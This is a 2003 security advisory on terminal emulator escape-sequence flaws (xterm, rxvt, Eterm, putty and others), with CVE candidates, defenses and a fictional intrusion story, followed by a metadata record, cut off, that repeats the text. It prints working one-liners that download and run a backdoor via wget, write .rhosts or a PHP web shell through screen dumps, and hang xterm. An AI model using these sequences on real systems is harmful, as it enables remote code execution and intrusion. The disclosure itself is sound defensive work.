Terminal Emulator Security Issues

2003-02-25T00:00:00

Description

TERMINAL EMULATOR SECURITY ISSUES Copyright © 2003 Digital Defense Incorporated All Rights Reserved [ Table of Contents ] -- Summary -- Disclaimer -- Escape Sequences -- Remote Exploitation -- Screen Dumping -- Window Title Reporting -- Miscellaneous Issues -- Terminal Defense -- Tested Emulator Versions -- Vulnerability Index -- A Fictitious Case Study -- References -- Credits [ Summary ] Many of the features supported by popular terminal emulator software can be abused when un-trusted data is displayed on the screen. The impact of this abuse can range from annoying screen garbage to a complete system compromise. All of the issues below are actually documented features, anyone who takes the time to read over the man pages or source code could use them to carry out an attack. [ Disclaimer ] There is nothing new in this paper. The entire concept of exploiting a terminal by supplying hostile input has been around for over 10 years now. Unix veterans and BBS users have been exposed to this type of problem since the very beginning, a newsgroup search can turn up all sorts of exploits, from the ever-popular "flash" program to the abuse of logging features in xterm which were disabled in R5. Therefore the purpose of this paper is to identify weaknesses in the current suite of popular terminal emulation software, not to rehash an ancient problem. [ Escape Sequences ] Typically, an escape sequence is a series of characters starting with the ASCII escape character (0x1B) and followed by a specific set of arguments. Escape sequences were originally used to control display devices such as dumb terminals and have been extended to allow various forms of interaction with modern operating systems. An escape sequence might be used to change text attributes (color, weight), move the cursor position, reconfigure the keyboard, update the window title, or manipulate the printer. Over the years, many new features have been added that required enhancements to the terminal emulator applications to support them. [ Remote Exploitation ] To exploit an escape sequence feature, an attacker must be able to display arbitrary data to the victim's terminal emulator. While at first glance that may seem rather unlikely, the attacker can take advantage of a number of small bugs in other applications to increase their chance of success. Just about every network service that uses syslog will pass remote data directly to the daemon without filtering the escape character. The responsibility then lays on the syslog daemon to strip the escape code before writing the log entry to the disk or terminal. Although both the stock *BSD syslog daemons as well the sysklogd package filter escape sequences, msyslog, syslog-ng, and the logging daemons supplied with many commercial UNIX-based operating systems do not. While sending data directly to a vulnerable syslogd or rwalld service is the most direct form of attack, there are literally dozens of other ways to place hostile binary data onto the terminal of a remote user. The Apache web server makes an effort to clean garbage from its access logs, but it still allows escape characters to be injected into the error logs. Many command-line network tools can be exploited by a hostile service response, some examples of this is include wget, curl, ftp, and telnet. Multi-user systems are especially vulnerable, as any user can send a system-wide message under the default configuration of most operating systems. Placing the attack data into the banner of a popular FTP server, telnet service, or message of the day file will increase the chance of finding a valid target. Certain console email clients refuse to display files when the content-type of an attachment is set to a unrecognized value, so the user must save the file and then read it on the command line, often just using the standard "cat" utility. [ Screen Dumping ] Eterm and rxvt both implement what they call the "screen dump" feature. This escape sequence will cause an arbitrary file to be opened and filled with the current contents of the terminal window. These are the only two tested emulators[1] that still had the ability to write to files enabled by default. Although rxvt will ignore dump requests for existing files, Eterm[2] will happily delete the file and then create it again. Although it is technically the same feature, the OSC code used to trigger it is different between the two emulators. For rxvt, the screen dump code is 55, for Eterm, it is 30. It is possible to control the entire contents of the file by specifying the reset sequence, then the required data, followed by the screen dump command. $ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a" The same approach can be used to create an authorized_keys file for SSH, a replacement passwd file, or even a hostile PHP script written to the user's web directory. This attack requires no interaction on the part of the user and would be very difficult to detect if done correctly. The primary difference between this issue and some of the others mentioned in this paper is that the actual "exploitation" happens on the system running the emulator software, not the current system that the terminal is accessing. The code that is responsible for opening the dump file is shown below. /* rxvt */ if ((fd = open(str, O_RDWR | O_CREAT | O_EXCL, 0600)) >= 0) /* Eterm */ unlink(fname); outfd = open(fname, O_CREAT | O_EXCL | O_NDELAY | O_WRONLY, S_IRUSR | S_IWUSR); [1] XFree86's xterm disabled an equivalent feature in X11R5 due to security concerns. It can still be enabled with a compile-time option. [2] Eterm actually disabled this in 0.9.2 (October 31, 2002), however many recent Linux distributions still shipped with 0.9.1. [ Window Title Reporting ] One of the features which most terminal emulators support is the ability for the shell to set the title of the window using an escape sequence. This feature was originally implemented by DEC for DECterm and has since been added to most emulators in use today. The easy way to set the window title of a terminal is using the echo command: $ echo -e "\e]2;This is the new window title\a" When the output of the above command is displayed on the terminal, it will set the window title to that string. Setting the window title by itself is not much of a security issue, however certain xterm variants (and dtterm) also provide an escape sequence for reporting the current window title. This essentially takes the current title and places it directly on the command line. Due to the way that most emulators processes the escape sequence, it is not possible to embed a carriage return into the window title itself, so the user would need to hit enter for it to process the title as a command. The escape sequence for reporting the window title is: $ echo -e "\e[21t" At this point, the attacker needs to convince the user to hit enter for the "exploit" to succeed. There are a number of techniques available to both hide the command and encourage the user to "press enter to continue". The simplest is to just insert a prompt followed by the "invisible" character attribute right before reporting the title. Another method is to set the foreground and background colors to be the same (all black or white) and hope the user hits the enter key when trying to determine what happened. The following example for xterm demonstrates a sequence that downloads and executes a backdoor while hiding the command line. The "Press Enter >" string should be changed to something appropriate for the attack vector. Some likely candidates include "wget internal error: press enter to continue" or "Error: unknown TERM, hit enter to continue". $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;" Any terminal emulator that allows the window title to be placed on the command-line is vulnerable to this attack. The applications which were confirmed vulnerable include xterm, dtterm, uxterm, rxvt, aterm, Eterm, hanterm, and putty[1]. The tested applications that did not allow the title to be written include gnome-terminal 2.0, konsole, SecureCRT, and aterm. [1] Although putty would place the title onto the command-line, we were not able to find a method of hiding the command, since neither the "invisible" character attribute nor the foreground color could be set. Putty has a relatively low limit to the number of characters that can be placed into the window title, so it is not possible to simply flood the screen with garbage and hope the command rolls past the current view. [ Miscellaneous Issues ] Eterm should be given an award for the "Easiest to Compromise" terminal emulator. The developers based much of their code off of the rxvt and xterm source, so Eterm tends to share the same problems as those two emulators as well. If you happen to be running a CVS version of Eterm from between February 10th and May 8th of 2001, it was possible to execute an arbitrary command just by displaying the following escape sequence: $ echo -e "\e]6;73;command\a" Fortunately, this feature never made it into an official release, the "fork-and-exec" ability was replaced by the script action spawn() instead. During the research process, a number of small bugs were found that would either lock up the emulator completely or crash it. Although they can be disregarded as simple denial of service attacks, they could be abused to prevent an administrator from seeing subsequent logs during a compromise. In general, the code which processed application- side input seemed to place little emphasis on sanitizing the data before passing it directly to system-level functions. While there was some effort made to avoid standard buffer overflows, much of the loop-based character processing appeared ripe for a denial of service attack. An example of this is a bug in the DEC UDK processing of XFree86's xterm application, the following command will place the process into a tight resource- eating loop: $ echo -e "\eP0;0|0A/17\x9c" This bug was reported to xfree86@xfree86.org on December 17th, 2002 and no response was received as of the publication of this writing. The hanterm application is also vulnerable to this issue, as the code base started off as a direct copy of xterm. Both rxvt and aterm support a feature known as the menuBar. This feature allows the user to create drop-down menus at the top of the terminal screen using both menu configuration files and escape sequences. Anyone able to display data on the terminal could modify the menu entries in a way that would compromise the system when accessed. This type of attack relies more on social engineering, but still provides a potential entry point when nothing else is available. The example below will create a new top-level menu item called "Special" with a single item labeled "Access", when clicked it will download and execute a backdoor from http://127.0.0.1/.bd and exit the shell. $ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a" [ Terminal Defense ] The ideal solution is to sanitize all data before displaying it on your terminal, however without a custom terminal application or data filter, you can't guarantee that every tool you use on the command-line is going to strip escape sequences. The responsibility should rest on the actual terminal emulator; any features that allow file or command-line access should be disabled by default and more attention should be paid to new features that implement any use of escape sequences. The tested terminal emulators that were not susceptible to the screen dump or window title attacks include KDE's konsole, Gnome's gnome-terminal, Vandyke's SecureCRT, and Sasha Vasko's aterm. Konsole and gnome-terminal each use their own independent code-base and didn't try to support the same massive feature set as the others. SecureCRT took a similar approach, emulating just the minimum needed to be usable. With aterm, the code was originally based on rxvt, however many of the dangerous features were removed as the project progressed. [ Test Emulator Versions ] xterm: xf86 4.2.0 (patch 165) aterm: 0.42 rxvt: 2.7.8 Eterm: 0.9.1 konsole: 3.1.0 rc5 putty: 0.53 SecureCRT: 3.4.6 gnome-terminal: 2.0.2 (libzvt 2.0.1) [2.2 indirectly] hanterm-xf: 2.0 [ Vulnerability Index ] The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned CVE candidate namess for all issues described in this paper. CAN-2003-0020 Apache Error Log Escape Sequence Injection CAN-2003-0021 Screen Dump: Eterm CAN-2003-0022 Screen Dump: rxvt CAN-2003-0063 Window Title Reporting: xterm CAN-2003-0064 Window Title Reporting: dtterm CAN-2003-0065 Window Title Reporting: uxterm CAN-2003-0066 Window Title Reporting: rxvt CAN-2003-0067 Window Title Reporting: aterm CAN-2003-0068 Window Title Reporting: eterm CAN-2003-0069 Window Title Reporting: putty CAN-2003-0070 Window Title Reporting: gnome-terminal CAN-2003-0078 Window Title Reporting: hanterm-xf CAN-2003-0071 DEC UDK Processing DoS: xterm CAN-2003-0079 DEC UDK Processing DoS: hanterm-xf CAN-2003-0023 Menubar Manipulation: rxvt CAN-2003-0024 Menubar Manipulation: aterm [ A Fictitious Case Study ] Jim is the sole administrator for the web server farm at a moderately sized ISP. Most of his company's clients maintain their own sites and Jim's primary responsibility is to keep the web servers online and secured. Jim spends some of his spare time dabbling with PHP and uses his workstation as his development system. The workstation is on the same network segment as the rest of the servers and the firewall only allows TCP port 80 and 443 inbound. Jim has a new 2.5Ghz P4 and finally has enough processing power to run the Enlightenment window manager with all the tweaks. His favorite part about Enlightenment is the terminal emulator, Eterm, which lets him make the background transparent and do all sorts of imaging tricks. Jim keeps a tail process running for the error_log files on each server he manages, allowing him to easily spot script bugs and misconfigurations before the customer calls him to fix it. Andre is pissed. Some "friends" from his old hacking group have posted some embarrassing photos of him on the group's home page. The page is hosted in the ~user directory on a web server at some dinky ISP his old friend uses. He starts poking at the web server only to give up about 30 minutes later after failing to find a single vulnerable CGI or outdated service. He starts up Nmap again, this time on the whole class C that the web server resides in, determined to take down the entire subnet if he has to. He finds another web server, this one is running a traceroute gateway that is vulnerable to meta- character injection. Andre manages to get an outbound shell back to a bounce system and proceeds to poke around. He finds what appears to be an OpenSSH public key in the /tmp directory, named JimH.pub. Looking at the key file, he sees that the userid stored in it is for jim@jimsbox.weeisp.com. A quick check shows that jimsbox.weeisp.com not only resolves to an external address, but is also running a web server. The index page of Jim's web server consists of a couple pictures of him, some links to his favorite news sites, some screenshots of his new super-leet desktop, and some of his latest PHP projects. The first PHP project link Andre clicks on immediately starts spewing errors, complaining about not being able to connect to the database. The error message itself is interesting though, since it contains the full path to the script that triggered the error. Andre makes a quick note of this and keeps digging around, hoping for an easy entry point. As soon as he pulls up the desktop screen shots, he knows he struck gold. The screen shot not only shows a scantily clad Italian model in the background, but an Eterm open tailing the logs of the same server his pictures are being served from. He gets to work, hitting the workstation with every tool he can find, but an hour later he still hasn't busted a shell. While looking through the screen shots again, Andre gets the idea to look at the Eterm documentation and see what other features it supports. Not only is the documentation easy to read with plenty of examples, but it mentions an interesting feature described as a "screen dump". About two hours later, Andre finally manages to get Eterm and its 60 megabytes of support libraries compiled. He discovers that to force Eterm to write out a file, all he has to do is display a certain sequence of characters to the screen. The question now is how to get those characters onto that Eterm at 4:30 in the morning. After a quick review of the Apache source code, he finally finds a spot in the error handling code where he can inject arbitrary data into the log files. All he has to do is send a request for a file with the escape sequence he wants to use and Apache will write the unfiltered data directly to the log file. Now that he can write arbitrary files to the workstation, he has to find a method of using it to gain access. Andre is pretty sure that the workstation is running SSH, but the only ports available are 80 and 443. He remembers that the PHP errors he saw earlier provided the full path to the web root, if he can write files there, then he run commands through the web server. Five minutes later, Andre is connecting to the target web server and sending a GET request for a string generated with the following command: $ echo -e "\ec<?passthru($c);?>\e]30;/home/www/htdocs/owned.php\a" This command clears the current screen buffer, displays his hostile PHP code to the screen, and then uses the screen dump command to write it into the web root. He points his browser to http://jimsbox.weeisp.com/owned.php?c=id and starts the process of rooting Jim's workstation, stealing his SSH keys, and taking those horrid pictures (as well as the rest of the group's files) off of that web server. [ References ] This Paper and Associated Tools --- http://www.digitaldefense.net/labs/whitepapers.html --- http://www.digitaldefense.net/labs/securitytools.html Recognized Escape Sequences --- Eterm: http://www.eterm.org/docs/view.php?doc=ref --- xterm: http://rtfm.etla.org/xterm/ctlseq.html --- dtterm: http://hpc.uky.edu/cgi-bin/man.cgi?section=all&topic=dtterm --- rxvt: http://www.rxvt.org/refer/rxvtRef.html Solar Designer's Post on Syslog Filtering --- http://marc.theaimsgroup.com/?l=bugtraq&m=96938656931350 ADM's "The Evil Escape Sequences" --- http://www.attrition.org/security/advisory/ADM/adm.evil.esc.advisory AmigaOS Escape Sequence Exploits --- http://www.abraxis.co.uk/SA-2001-11-08.html MS-DOS/Windows Key Redefinition --- http://lists.insecure.org/lists/bugtraq/1994/Jul/0029.html Multiple Emulator Window Resize DoS --- http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html --- http://groups.google.com/groups?selm=E12zFeu-00075I-00%40ixion The Original "Flash" --- http://www.parallaxresearch.com/files/unix/exploits/flash.c --- http://groups.google.com/groups?selm=342k7c%243ne%40news.ysu.edu --- http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=47&a=4 [ Credits ] This paper was written by H D Moore, with much help from the rest of the Digital Defense Operations Team. I would like to thank Solar Designer for providing some great feedback on the original draft and Mark Cox for handling the CVE candidate generation and vendor coordination.

{"id": "SECURITYVULNS:DOC:4128", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "Terminal Emulator Security Issues", "description": "TERMINAL EMULATOR SECURITY ISSUES\r\nCopyright \u00a9 2003 Digital Defense Incorporated\r\nAll Rights Reserved\r\n\r\n\r\n\r\n[ Table of Contents ]\r\n\r\n-- Summary \r\n-- Disclaimer \r\n-- Escape Sequences \r\n-- Remote Exploitation \r\n-- Screen Dumping \r\n-- Window Title Reporting\r\n-- Miscellaneous Issues \r\n-- Terminal Defense\r\n-- Tested Emulator Versions\r\n-- Vulnerability Index\r\n-- A Fictitious Case Study\r\n-- References\r\n-- Credits\r\n\r\n\r\n[ Summary ]\r\n\r\nMany of the features supported by popular terminal emulator software can be abused \r\nwhen un-trusted data is displayed on the screen. The impact of this abuse can range from \r\nannoying screen garbage to a complete system compromise. All of the issues below are \r\nactually documented features, anyone who takes the time to read over the man pages or \r\nsource code could use them to carry out an attack. \r\n\r\n\r\n\r\n[ Disclaimer ]\r\n\r\nThere is nothing new in this paper. The entire concept of exploiting a terminal by \r\nsupplying hostile input has been around for over 10 years now. Unix veterans and BBS \r\nusers have been exposed to this type of problem since the very beginning, a newsgroup \r\nsearch can turn up all sorts of exploits, from the ever-popular "flash" program to the \r\nabuse of logging features in xterm which were disabled in R5. Therefore the purpose of \r\nthis paper is to identify weaknesses in the current suite of popular terminal emulation \r\nsoftware, not to rehash an ancient problem.\r\n\r\n\r\n\r\n[ Escape Sequences ]\r\n\r\nTypically, an escape sequence is a series of characters starting with the ASCII escape \r\ncharacter (0x1B) and followed by a specific set of arguments. Escape sequences were \r\noriginally used to control display devices such as dumb terminals and have been extended\r\nto allow various forms of interaction with modern operating systems. An escape sequence \r\nmight be used to change text attributes (color, weight), move the cursor position, \r\nreconfigure the keyboard, update the window title, or manipulate the printer. Over the \r\nyears, many new features have been added that required enhancements to the terminal \r\nemulator applications to support them. \r\n\r\n\r\n\r\n[ Remote Exploitation ]\r\n\r\nTo exploit an escape sequence feature, an attacker must be able to display arbitrary data \r\nto the victim's terminal emulator. While at first glance that may seem rather unlikely, the \r\nattacker can take advantage of a number of small bugs in other applications to increase \r\ntheir chance of success.\r\n\r\nJust about every network service that uses syslog will pass remote data directly to the \r\ndaemon without filtering the escape character. The responsibility then lays on the syslog \r\ndaemon to strip the escape code before writing the log entry to the disk or terminal. \r\nAlthough both the stock *BSD syslog daemons as well the sysklogd package filter escape \r\nsequences, msyslog, syslog-ng, and the logging daemons supplied with many commercial \r\nUNIX-based operating systems do not.\r\n\r\nWhile sending data directly to a vulnerable syslogd or rwalld service is the most direct \r\nform of attack, there are literally dozens of other ways to place hostile binary data onto\r\nthe terminal of a remote user. The Apache web server makes an effort to clean garbage \r\nfrom its access logs, but it still allows escape characters to be injected into the error logs.\r\nMany command-line network tools can be exploited by a hostile service response, some \r\nexamples of this is include wget, curl, ftp, and telnet. \r\n\r\nMulti-user systems are especially vulnerable, as any user can send a system-wide \r\nmessage under the default configuration of most operating systems. Placing the attack \r\ndata into the banner of a popular FTP server, telnet service, or message of the day file \r\nwill increase the chance of finding a valid target. Certain console email clients refuse to \r\ndisplay files when the content-type of an attachment is set to a unrecognized value, so the \r\nuser must save the file and then read it on the command line, often just using the standard \r\n"cat" utility. \r\n\r\n\r\n\r\n[ Screen Dumping ]\r\n \r\nEterm and rxvt both implement what they call the "screen dump" feature. This escape \r\nsequence will cause an arbitrary file to be opened and filled with the current contents of \r\nthe terminal window. These are the only two tested emulators[1] that still had the ability \r\nto write to files enabled by default. Although rxvt will ignore dump requests for existing \r\nfiles, Eterm[2] will happily delete the file and then create it again. Although it is \r\ntechnically the same feature, the OSC code used to trigger it is different between the two \r\nemulators. For rxvt, the screen dump code is 55, for Eterm, it is 30. It is possible to \r\ncontrol the entire contents of the file by specifying the reset sequence, then the required \r\ndata, followed by the screen dump command. \r\n\r\n$ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"\r\n\r\nThe same approach can be used to create an authorized_keys file for SSH, a replacement \r\npasswd file, or even a hostile PHP script written to the user's web directory. This attack \r\nrequires no interaction on the part of the user and would be very difficult to detect if done \r\ncorrectly. The primary difference between this issue and some of the others mentioned in \r\nthis paper is that the actual "exploitation" happens on the system running the emulator \r\nsoftware, not the current system that the terminal is accessing. The code that is \r\nresponsible for opening the dump file is shown below. \r\n\r\n/* rxvt */ \r\nif ((fd = open(str, O_RDWR | O_CREAT | O_EXCL, 0600)) >= 0) \r\n\r\n/* Eterm */ \r\nunlink(fname);\r\noutfd = open(fname, O_CREAT | O_EXCL | O_NDELAY | O_WRONLY, S_IRUSR | S_IWUSR);\r\n\r\n[1] XFree86's xterm disabled an equivalent feature in X11R5 due to security concerns. It \r\n can still be enabled with a compile-time option.\r\n\r\n[2] Eterm actually disabled this in 0.9.2 (October 31, 2002), however many recent Linux \r\n distributions still shipped with 0.9.1.\r\n\r\n\r\n\r\n[ Window Title Reporting ]\r\n\r\nOne of the features which most terminal emulators support is the ability for the shell to \r\nset the title of the window using an escape sequence. This feature was originally \r\nimplemented by DEC for DECterm and has since been added to most emulators in use \r\ntoday. The easy way to set the window title of a terminal is using the echo command:\r\n\r\n$ echo -e "\e]2;This is the new window title\a"\r\n\r\nWhen the output of the above command is displayed on the terminal, it will set the \r\nwindow title to that string. Setting the window title by itself is not much of a security \r\nissue, however certain xterm variants (and dtterm) also provide an escape sequence for \r\nreporting the current window title. This essentially takes the current title and places it \r\ndirectly on the command line. Due to the way that most emulators processes the escape \r\nsequence, it is not possible to embed a carriage return into the window title itself, so the \r\nuser would need to hit enter for it to process the title as a command. The escape sequence \r\nfor reporting the window title is:\r\n\r\n$ echo -e "\e[21t"\r\n\r\nAt this point, the attacker needs to convince the user to hit enter for the "exploit" to \r\nsucceed. There are a number of techniques available to both hide the command and \r\nencourage the user to "press enter to continue". The simplest is to just insert a prompt \r\nfollowed by the "invisible" character attribute right before reporting the title. Another \r\nmethod is to set the foreground and background colors to be the same (all black or white) \r\nand hope the user hits the enter key when trying to determine what happened. The \r\nfollowing example for xterm demonstrates a sequence that downloads and executes a \r\nbackdoor while hiding the command line. The "Press Enter >" string should be changed \r\nto something appropriate for the attack vector. Some likely candidates include "wget \r\ninternal error: press enter to continue" or "Error: unknown TERM, hit enter to continue".\r\n\r\n$ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"\r\n\r\nAny terminal emulator that allows the window title to be placed on the command-line is \r\nvulnerable to this attack. The applications which were confirmed vulnerable include \r\nxterm, dtterm, uxterm, rxvt, aterm, Eterm, hanterm, and putty[1]. The tested applications \r\nthat did not allow the title to be written include gnome-terminal 2.0, konsole, SecureCRT,\r\nand aterm.\r\n\r\n[1] Although putty would place the title onto the command-line, we were not able to find \r\na method of hiding the command, since neither the "invisible" character attribute nor the \r\nforeground color could be set. Putty has a relatively low limit to the number of characters \r\nthat can be placed into the window title, so it is not possible to simply flood the screen \r\nwith garbage and hope the command rolls past the current view.\r\n\r\n\r\n\r\n[ Miscellaneous Issues ]\r\n\r\nEterm should be given an award for the "Easiest to Compromise" terminal emulator. The \r\ndevelopers based much of their code off of the rxvt and xterm source, so Eterm tends to \r\nshare the same problems as those two emulators as well. If you happen to be running a \r\nCVS version of Eterm from between February 10th and May 8th of 2001, it was possible \r\nto execute an arbitrary command just by displaying the following escape sequence: \r\n\r\n$ echo -e "\e]6;73;command\a"\r\n \r\nFortunately, this feature never made it into an official release, the "fork-and-exec" ability \r\nwas replaced by the script action spawn() instead. \r\n\r\nDuring the research process, a number of small bugs were found that would either lock \r\nup the emulator completely or crash it. Although they can be disregarded as simple denial \r\nof service attacks, they could be abused to prevent an administrator from seeing \r\nsubsequent logs during a compromise. In general, the code which processed application-\r\nside input seemed to place little emphasis on sanitizing the data before passing it directly \r\nto system-level functions. While there was some effort made to avoid standard buffer \r\noverflows, much of the loop-based character processing appeared ripe for a denial of \r\nservice attack. An example of this is a bug in the DEC UDK processing of XFree86's \r\nxterm application, the following command will place the process into a tight resource-\r\neating loop:\r\n\r\n$ echo -e "\eP0;0|0A/17\x9c"\r\n\r\nThis bug was reported to xfree86@xfree86.org on December 17th, 2002 and no response \r\nwas received as of the publication of this writing. The hanterm application is also \r\nvulnerable to this issue, as the code base started off as a direct copy of xterm.\r\n\r\nBoth rxvt and aterm support a feature known as the menuBar. This feature allows the user \r\nto create drop-down menus at the top of the terminal screen using both menu \r\nconfiguration files and escape sequences. Anyone able to display data on the terminal \r\ncould modify the menu entries in a way that would compromise the system when \r\naccessed. This type of attack relies more on social engineering, but still provides a \r\npotential entry point when nothing else is available. The example below will create a new \r\ntop-level menu item called "Special" with a single item labeled "Access", when clicked it \r\nwill download and execute a backdoor from http://127.0.0.1/.bd and exit the shell.\r\n\r\n$ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"\r\n\r\n\r\n\r\n[ Terminal Defense ]\r\n\r\nThe ideal solution is to sanitize all data before displaying it on your terminal, however \r\nwithout a custom terminal application or data filter, you can't guarantee that every tool \r\nyou use on the command-line is going to strip escape sequences. The responsibility \r\nshould rest on the actual terminal emulator; any features that allow file or command-line \r\naccess should be disabled by default and more attention should be paid to new features \r\nthat implement any use of escape sequences.\r\n\r\nThe tested terminal emulators that were not susceptible to the screen dump or window \r\ntitle attacks include KDE's konsole, Gnome's gnome-terminal, Vandyke's SecureCRT, \r\nand Sasha Vasko's aterm. Konsole and gnome-terminal each use their own independent \r\ncode-base and didn't try to support the same massive feature set as the others. \r\nSecureCRT took a similar approach, emulating just the minimum needed to be usable. \r\nWith aterm, the code was originally based on rxvt, however many of the dangerous \r\nfeatures were removed as the project progressed.\r\n\r\n\r\n\r\n[ Test Emulator Versions ]\r\n\r\nxterm: xf86 4.2.0 (patch 165)\r\naterm: 0.42\r\nrxvt: 2.7.8\r\nEterm: 0.9.1\r\nkonsole: 3.1.0 rc5\r\nputty: 0.53\r\nSecureCRT: 3.4.6\r\ngnome-terminal: 2.0.2 (libzvt 2.0.1) [2.2 indirectly]\r\nhanterm-xf: 2.0\r\n\r\n\r\n\r\n[ Vulnerability Index ]\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned CVE \r\ncandidate namess for all issues described in this paper. \r\n\r\nCAN-2003-0020 Apache Error Log Escape Sequence Injection\r\n\r\nCAN-2003-0021 Screen Dump: Eterm \r\nCAN-2003-0022 Screen Dump: rxvt\r\n\r\nCAN-2003-0063 Window Title Reporting: xterm \r\nCAN-2003-0064 Window Title Reporting: dtterm\r\nCAN-2003-0065 Window Title Reporting: uxterm\r\nCAN-2003-0066 Window Title Reporting: rxvt\r\nCAN-2003-0067 Window Title Reporting: aterm\r\nCAN-2003-0068 Window Title Reporting: eterm\r\nCAN-2003-0069 Window Title Reporting: putty\r\nCAN-2003-0070 Window Title Reporting: gnome-terminal\r\nCAN-2003-0078 Window Title Reporting: hanterm-xf\r\n\r\nCAN-2003-0071 DEC UDK Processing DoS: xterm\r\nCAN-2003-0079 DEC UDK Processing DoS: hanterm-xf\r\n\r\nCAN-2003-0023 Menubar Manipulation: rxvt\r\nCAN-2003-0024 Menubar Manipulation: aterm\r\n\r\n\r\n\r\n[ A Fictitious Case Study ]\r\n\r\nJim is the sole administrator for the web server farm at a moderately sized ISP. Most of \r\nhis company's clients maintain their own sites and Jim's primary responsibility is to keep \r\nthe web servers online and secured. Jim spends some of his spare time dabbling with \r\nPHP and uses his workstation as his development system. The workstation is on the same \r\nnetwork segment as the rest of the servers and the firewall only allows TCP port 80 and \r\n443 inbound. Jim has a new 2.5Ghz P4 and finally has enough processing power to run \r\nthe Enlightenment window manager with all the tweaks. His favorite part about \r\nEnlightenment is the terminal emulator, Eterm, which lets him make the background \r\ntransparent and do all sorts of imaging tricks. Jim keeps a tail process running for the \r\nerror_log files on each server he manages, allowing him to easily spot script bugs and \r\nmisconfigurations before the customer calls him to fix it. \r\n\r\nAndre is pissed. Some "friends" from his old hacking group have posted some \r\nembarrassing photos of him on the group's home page. The page is hosted in the ~user \r\ndirectory on a web server at some dinky ISP his old friend uses. He starts poking at the \r\nweb server only to give up about 30 minutes later after failing to find a single vulnerable \r\nCGI or outdated service. He starts up Nmap again, this time on the whole class C that the \r\nweb server resides in, determined to take down the entire subnet if he has to. He finds \r\nanother web server, this one is running a traceroute gateway that is vulnerable to meta-\r\ncharacter injection. Andre manages to get an outbound shell back to a bounce system and \r\nproceeds to poke around. He finds what appears to be an OpenSSH public key in the /tmp \r\ndirectory, named JimH.pub. Looking at the key file, he sees that the userid stored in it is \r\nfor jim@jimsbox.weeisp.com. A quick check shows that jimsbox.weeisp.com not only \r\nresolves to an external address, but is also running a web server. \r\n\r\nThe index page of Jim's web server consists of a couple pictures of him, some links to his \r\nfavorite news sites, some screenshots of his new super-leet desktop, and some of his \r\nlatest PHP projects. The first PHP project link Andre clicks on immediately starts \r\nspewing errors, complaining about not being able to connect to the database. The error \r\nmessage itself is interesting though, since it contains the full path to the script that \r\ntriggered the error. Andre makes a quick note of this and keeps digging around, hoping \r\nfor an easy entry point. As soon as he pulls up the desktop screen shots, he knows he \r\nstruck gold. The screen shot not only shows a scantily clad Italian model in the \r\nbackground, but an Eterm open tailing the logs of the same server his pictures are being \r\nserved from. He gets to work, hitting the workstation with every tool he can find, but an \r\nhour later he still hasn't busted a shell. While looking through the screen shots again, \r\nAndre gets the idea to look at the Eterm documentation and see what other features it \r\nsupports. Not only is the documentation easy to read with plenty of examples, but it \r\nmentions an interesting feature described as a "screen dump".\r\n\r\nAbout two hours later, Andre finally manages to get Eterm and its 60 megabytes of \r\nsupport libraries compiled. He discovers that to force Eterm to write out a file, all he has \r\nto do is display a certain sequence of characters to the screen. The question now is how to \r\nget those characters onto that Eterm at 4:30 in the morning. After a quick review of the \r\nApache source code, he finally finds a spot in the error handling code where he can inject \r\narbitrary data into the log files. All he has to do is send a request for a file with the escape\r\nsequence he wants to use and Apache will write the unfiltered data directly to the log file. \r\n\r\nNow that he can write arbitrary files to the workstation, he has to find a method of using \r\nit to gain access. Andre is pretty sure that the workstation is running SSH, but the only \r\nports available are 80 and 443. He remembers that the PHP errors he saw earlier provided \r\nthe full path to the web root, if he can write files there, then he run commands through the \r\nweb server. Five minutes later, Andre is connecting to the target web server and sending \r\na GET request for a string generated with the following command:\r\n\r\n$ echo -e "\ec<?passthru($c);?>\e]30;/home/www/htdocs/owned.php\a"\r\n\r\nThis command clears the current screen buffer, displays his hostile PHP code to the \r\nscreen, and then uses the screen dump command to write it into the web root. He points \r\nhis browser to http://jimsbox.weeisp.com/owned.php?c=id and starts the process of \r\nrooting Jim's workstation, stealing his SSH keys, and taking those horrid pictures (as well \r\nas the rest of the group's files) off of that web server.\r\n\r\n\r\n\r\n[ References ]\r\n\r\nThis Paper and Associated Tools\r\n--- http://www.digitaldefense.net/labs/whitepapers.html\r\n--- http://www.digitaldefense.net/labs/securitytools.html\r\n\r\nRecognized Escape Sequences\r\n--- Eterm: http://www.eterm.org/docs/view.php?doc=ref\r\n--- xterm: http://rtfm.etla.org/xterm/ctlseq.html\r\n--- dtterm: http://hpc.uky.edu/cgi-bin/man.cgi?section=all&topic=dtterm\r\n--- rxvt: http://www.rxvt.org/refer/rxvtRef.html\r\n\r\nSolar Designer's Post on Syslog Filtering\r\n--- http://marc.theaimsgroup.com/?l=bugtraq&m=96938656931350\r\n\r\nADM's "The Evil Escape Sequences"\r\n--- http://www.attrition.org/security/advisory/ADM/adm.evil.esc.advisory\r\n\r\nAmigaOS Escape Sequence Exploits\r\n--- http://www.abraxis.co.uk/SA-2001-11-08.html\r\n\r\nMS-DOS/Windows Key Redefinition\r\n--- http://lists.insecure.org/lists/bugtraq/1994/Jul/0029.html\r\n\r\nMultiple Emulator Window Resize DoS\r\n--- http://archives.neohapsis.com/archives/bugtraq/2000-05/0409.html\r\n--- http://groups.google.com/groups?selm=E12zFeu-00075I-00%40ixion\r\n\r\nThe Original "Flash"\r\n--- http://www.parallaxresearch.com/files/unix/exploits/flash.c\r\n--- http://groups.google.com/groups?selm=342k7c%243ne%40news.ysu.edu\r\n--- http://www.phrack-dont-give-a-shit-about-dmca.org/show.php?p=47&a=4\r\n\r\n\r\n\r\n[ Credits ]\r\n\r\nThis paper was written by H D Moore, with much help from the rest of the Digital \r\nDefense Operations Team. I would like to thank Solar Designer for providing some great \r\nfeedback on the original draft and Mark Cox for handling the CVE candidate generation \r\nand vendor coordination.", "published": 